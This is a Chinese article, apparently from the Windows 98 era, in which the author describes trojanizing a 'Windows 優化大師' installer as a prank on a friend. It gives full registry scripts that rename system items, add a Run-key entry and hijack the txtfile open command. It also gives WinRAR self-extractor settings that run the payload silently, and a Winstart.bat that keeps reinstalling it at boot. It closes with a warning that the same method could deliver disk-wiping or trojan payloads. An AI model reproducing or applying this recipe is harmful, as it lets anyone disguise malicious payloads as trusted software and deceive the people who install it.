作者:數據恢復
與Winzip相比,Winrar3.0的自解壓程序要多出功能。其中一項最爲突出的功能,也是潛在着最大危險的是:它可以在解壓前或解壓後,無聲無息地自動運行程序。
如果你不以爲然,先看完以下事例:
幾天前,一位朋友要我copy一份我從網上下載的'Windows 優化大師’給他,我靈機一動,想起這幾天研究Winrar3.0的心得,便滿口答應。到了晚上,我花了幾小時的時間爲他特製了一份'Windows 優化大師’,製作流程如下:建立一個註冊表腳本文件,我取的文件名爲regeditt.reg在裏面寫入:
REGEDIT4
[HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion]
"Registered Owner"="××"
[HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E}]
@="××""InfoTip"="包含可以恢復或永久刪除的已刪除項目。"
[HKEY_USERS/.DEFAULT/Software/Classes/CLSID/{20D04FE0-3AEA-1069-A2D8-08002B30309D}]
@="××的電腦"
[HKEY_CURRENT_USER/Control Panel/International]
"StimeFormat"="×× HH:mm"
[HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Run]
"TaskMonitoy"="regedit /s c://Windows//sysbckup
//regeditt.reg"
注:以上××均是不健康的調侃他人的詞彙,編輯對它們做了淨化。
上面第一項是更改計算機註冊名稱,第二項是更改'回收站’名稱,第三項是更改'我的電腦’名稱。第四項是在任務欄時間前加上文字,第五項是每次開機後自動運行c:/Windows/sysbckup/regeditt.reg。
建立完成後就是用Winrar打包了,選中regeditt.reg後擊右鍵,在菜單中選'添加到檔案文件’,在彈出對話框中,把檔案名稱寫爲a1.exe,在下面存檔選項中選中'創建自釋放格式’。然後在高級-自釋放選項中寫入釋放路徑,我寫的是c:/Windows/Sysbckup,接下來就是在'釋放後運行’中寫入regeditt.reg,然後在模式中選中'全部隱藏’和'覆蓋所有文件’,完成這些後按確定,再選擇註釋我們會看到以下內容:
Path=c:/Windows/SysbckupSetup=regeditt.regSilent=1Overwrite=1
我們發現釋放後運行的格式是Setup=*.*,這裏是=regeditt.reg,但這樣運行後系統會提示你是否確認導入註冊表,所以應作如下修改:
Path=c:/Windows/SysbckupSetup=regedit /s regeditt.regSilent=1Overwrite=1
完成後按確定按扭,就會建立出一個名爲a1.exe的Winrar自解壓程序,如果雙擊運行它,屏幕上將沒有任何顯示,但它已無聲無息地把regeditt.reg拷貝到c:/Windows/Sysbckup,並把其中的內容寫入到註冊表中了。
現在的問題是如何讓我的朋友運行A1.exe呢?對了,用'Windows 優化大師’。把A1.exe與'Windows 優化大師’的安裝文件(解壓後的)放在一起打包,建立 Windows 優化大師.exe,全選後擊右鍵,選'添加到檔案文件’……操作大致同A1.exe。只不過名稱改爲 Windows 優化大師.exe,解壓路徑改成:c:/Windows/temp,而且解壓後要運行A1.exe和setup.exe兩個文件,其註釋內容應爲:
Path=c:/Windows/tempSetup=a1.exeSetup=setup.exeSilent=1Overwrite=1
按確認後,我們已初步完成了一份特製的'Windows 優化大師’了,爲什麼說'初步’完成呢?因爲現在修改註冊表和啓動項早已不是什麼祕密了,所以A1.exe只不過是附料,還需要加入一味主料:A2.exe.把regeditt.reg更名另存爲system.reg,去掉其中的
[HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Run]
"TaskMonitoy"="regedit /s c://Windows//sysbckup//regeditt.reg"
然後用計事本建立Winstart.bat,其中內容要寫成:@echo off regedit c:/Windows/system.reg>nul這樣寫屏幕上將沒有顯示,完成後把這兩個文件用Winrar作成自解壓程序A2.exe,操作同A1.exe,但解壓路徑要改成 c:/WinDOWS,解壓後也不需運行.其註釋內容應爲:
Path=c:/WindowsSilent=1Overwrite=1
完成後把a2.exe加入做好的 Windows 優化大師.exe,加入方法是:右擊 Windows 優化大師.exe選擇'用Winrar打開’,把a2.exe拖入,按確定,然後點擊工具欄中的註釋,修改其中內容爲:
Path=c:/Windows/tempSetup=a1.exeSetup=a2.exeSetup=setup.exeSilent=1Overwrite=1
然後確定-退出。到此爲止,特製的'Windows 優化大師.exe’已全部完成。因爲Winstart.bat是在進入Windows圖形界面之前運行的一個程序,所以加入A2.exe後,就算我的朋友能恢復註冊表,甚至刪除regeditt.reg,但只要c:/Windows下的system.reg和Winstart.bat不被發現,重啓動後他的電腦將'××’依舊。
在Windows98中啓動程序的方法很多,如通過AUTOEXEC.BAT、Winstart.bat、開始菜單中的啓動、註冊表中的啓動項、Win.ini、system.ini、Wininit.ini和修改文件關聯等都可達到啓動程序的目的。如:用Winrar自解壓程序在註冊表中導入
REGEDIT4
[HKEY_CLASSES_ROOT/txtfile/shell/open/command]
@="regedit /s c://Windows//system.reg"
那麼在雙擊txt類型文件時將不會以計事本打開,而是沒有任何反應。但c://Windows//system.reg中的內容也會悄無聲息的被導入註冊表。但我沒有這樣做,因爲現在的這些已經夠的的朋友折騰了。
第二天,我把這份'精裝’的 Windows 優化大師 交給了朋友,其後果可想而知。足足三天他在對着屏幕上的'××’發愣。
以上的這些只是我用了Winrar強大的自解壓功能,和朋友開了一個小玩笑,但從上面事例不難看出,WinrarR的這些功能使不會編程的人也能製作出一些惡意的程序,如果有人給這些程序起上一些漂亮的名字(如Windows 優化大師 2002 等)在網上發佈,用它來format你的硬盤、deltree你的文件等等,也不是沒有可能的。最最可怕的是,如果運行的是一個木馬程序的客戶端,那後果更加的不勘設想。
